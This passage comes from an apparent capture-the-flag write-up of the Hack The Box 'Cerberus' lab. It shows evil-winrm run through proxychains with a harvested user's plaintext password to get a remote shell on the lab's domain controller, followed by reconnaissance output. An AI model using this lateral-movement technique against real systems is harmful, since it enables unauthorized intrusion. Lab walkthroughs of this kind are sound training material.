WinRm
The scan result reveals that the dc.cerberus.local host has a WinRM service up and running on the port 5985 and accessible from the icinga.cerberus.local host
Using the credential of the matthew user, I will attempt to gain a foothold to the DC host leveraging the established reverse socks proxy
┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ proxychains -q evil-winrm -i 172.16.22.1 -u matthew -p 147258369
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\matthew\Documents> whoami
cerberus\matthew
*evil-winrm* ps c:\Users\matthew\Documents> hostname
DC
*evil-winrm* ps c:\Users\matthew\Documents> ipconfig
Windows IP Configuration
ethernet adapter vethernet (switch1):
connection-specific dns suffix . :
link-local ipv6 address . . . . . : fe80::e225:edaa:5112:dfc3%6
ipv4 address. . . . . . . . . . . : 172.16.22.1
subnet mask . . . . . . . . . . . : 255.255.255.240
default gateway . . . . . . . . . :
ethernet adapter ethernet0 3:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::138
ipv6 address. . . . . . . . . . . : dead:beef::c349:4d0f:4db0:880
link-local ipv6 address . . . . . : fe80::2df8:1fb:a85b:f52d%5
ipv4 address. . . . . . . . . . . : 10.10.11.205
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%5
10.10.10.2Lateral Movement made to the matthew user on the dc.cerberus.local host via WinRM
Initial Foothold established to the dc.cerberus.local host